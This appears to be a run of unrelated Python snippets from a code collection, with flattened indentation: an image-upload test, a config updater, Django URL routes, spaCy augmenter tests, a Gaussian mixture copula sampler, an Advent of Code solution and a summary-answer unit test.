response = await ac.post("/image", files=image_file)
assert response.status_code == 200
    thumbnail_name = response.json().get('thumbnail').split('/')[-1]
    imagePaths = {
        'original': thumbnail_name.split('.')[0] + '.png',
        'thumbnail': thumbnail_name
    }
assert Path(os.environ.get('IMAGE_THUMBNAIL_LOCAL_PATH') + '/' +imagePaths['thumbnail']).is_file() == True
cleaning_service(imagePaths, images = True) |
498592 | import json
import os
# Change the "report_elements" array in the config.json file
# input is an array, for example: ["facebook", "twitter"]
def modules_update(self, modules):
new_config = self.CONFIG
new_config["report_elements"] = modules
try:
with open(self.CONFIG["config_path"], 'w') as fp:
json.dump(new_config, fp, indent=4)
except Exception as e:
print(e)
# Remove modules that do not exist
def get_report_modules(self):
return list( set(self.CONFIG["report_elements"]) & set(list(self.CONFIG["plateform"].keys())) ) |
498605 | from django.conf.urls import url, include
from nimbus.apps import debug_urls
from rest_framework.authtoken.views import obtain_auth_token
from . import views
urlpatterns = debug_urls()
urlpatterns += [
url(r"^$", views.api_root, name="api_root"),
url(r'^api-auth/', include('rest_framework.urls', namespace='rest_framework')),
    url(r'^api-token-auth$', obtain_auth_token),  # string view references were removed in Django 1.10
url(r"^media/list$", views.MediaList.as_view(), name="media_list"),
url(r"^media/show$", views.MediaDetail.as_view(), name="media_detail"),
url(r"^media/add_file$", views.AddFile.as_view(), name="add_file"),
url(r"^media/add_link$", views.AddLink.as_view(), name="add_link"),
url(r"^media/delete$", views.delete_media, name="delete_media"),
]
|
498643 | from dacy.augmenters import (
create_char_swap_augmenter,
create_spacing_augmenter,
create_char_random_augmenter,
create_char_replace_augmenter,
)
from spacy.lang.da import Danish
from spacy.training import Example
def test_create_char_swap_augmenter():
aug = create_char_swap_augmenter(doc_level=1, char_level=1)
nlp = Danish()
doc = nlp("qw")
example = Example(doc, doc)
examples = aug(nlp, example)
example_aug = next(examples)
assert example_aug.x.text == "wq"
def test_create_spacing_augmenter():
aug = create_spacing_augmenter(doc_level=1, spacing_level=1)
nlp = Danish()
doc = nlp("en sætning.")
example = Example(doc, doc)
examples = aug(nlp, example)
example_aug = next(examples)
assert example_aug.x.text == "ensætning."
def test_create_char_random_augmenter():
aug = create_char_random_augmenter(doc_level=1, char_level=1)
nlp = Danish()
doc = nlp("en sætning.")
example = Example(doc, doc)
examples = aug(nlp, example)
example_aug = next(examples)
assert example_aug.x.text != "en sætning."
def test_create_char_replace_augmenter():
aug = create_char_replace_augmenter(
doc_level=1, char_level=1, replacement={"q": ["a", "b"]}
)
nlp = Danish()
doc = nlp("q w")
example = Example(doc, doc)
examples = aug(nlp, example)
example_aug = next(examples)
assert example_aug.x[0].text in ["a", "b"]
assert example_aug.x[1].text == "w"
|
498647 | import numpy as np
from numpy.random import choice
from scipy.stats import multivariate_normal as mvn
from .marginals import gmm_marginal_cdf
from .parameter import GMCParam
__all__ = ['random_gmcm']
def random_gmcm(n: int, param: GMCParam):
"""
Generates random variables from a Gaussian Mixture Copula Model
Parameters
----------
n : int
The number of instances to generate
param : GMCParam
The Gaussian Mixture Copula parameter
Returns
-------
np.ndarray
An array of random variables
"""
z = random_gmm(n, param) # latent realizations from Gaussian mixture model
return gmm_marginal_cdf(z, param)
def random_gmm(n: int, param: GMCParam):
"""Generates random variables from a Gaussian Mixture Model"""
output = np.empty((n, param.n_dim))
order = choice(range(param.n_clusters), n, p=param.prob)
for i in range(param.n_clusters):
k = sum(order == i)
output[order == i] = mvn.rvs(param.means[i], cov=param.covs[i], size=k)
return output
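# Hedged usage sketch (the GMCParam constructor arguments below are an assumption; adjust
# them to the actual signature exposed by .parameter):
#
#     param = GMCParam(n_clusters=2, n_dim=3, prob=[0.4, 0.6],
#                      means=np.zeros((2, 3)), covs=[np.eye(3)] * 2)
#     u = random_gmcm(1000, param)  # samples whose marginals are uniform on [0, 1]
#     z = random_gmm(1000, param)   # latent Gaussian-mixture samples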
|
498665 | import re
import numpy as np
from tool.runners.python import SubmissionPy
class SilvestreSubmission(SubmissionPy):
def parse(self, s):
# "#1400 @ 873,28: 11x27"
rec = re.compile(r"^#(\d+) @ (\d+),(\d+): (\d+)x(\d+)$")
rectangles = [rec.match(row) for row in s.splitlines()]
rectangles = [tuple(map(int, m.groups())) for m in rectangles]
return rectangles
def run(self, s):
# :param s: input in string format
# :return: solution flag
# Your code goes here
rectangles = self.parse(s) # list of (id, x, y, width, height)
array = np.zeros((1000, 1000), dtype=np.uint)
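        # each cell of the 1000x1000 fabric grid counts how many claims cover that square inch;
        # the answer is the number of cells claimed at least twice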
for (_, x, y, width, height) in rectangles:
array[x:x+width, y:y+height] += 1
return np.sum(array >= 2)
|
498831 | from unittest import TestCase
from app.templating.summary.answer import Answer
class TestAnswer(TestCase):
def test_create_answer(self):
# Given
answer_schema = {'id': 'answer-id', 'label': 'Answer Label', 'type': 'date'}
user_answer = 'An answer'
# When
answer = Answer(answer_schema, user_answer, 2)
# Then
self.assertEqual(answer.id, 'answer-id-2')
self.assertEqual(answer.label, 'Answer Label')
self.assertEqual(answer.value, user_answer)
def test_date_answer_type(self):
# Given
answer_schema = {'id': 'answer-id', 'label': '', 'type': 'date'}
user_answer = None
# When
answer = Answer(answer_schema, user_answer, 0)
# Then
self.assertEqual(answer.type, 'date')
|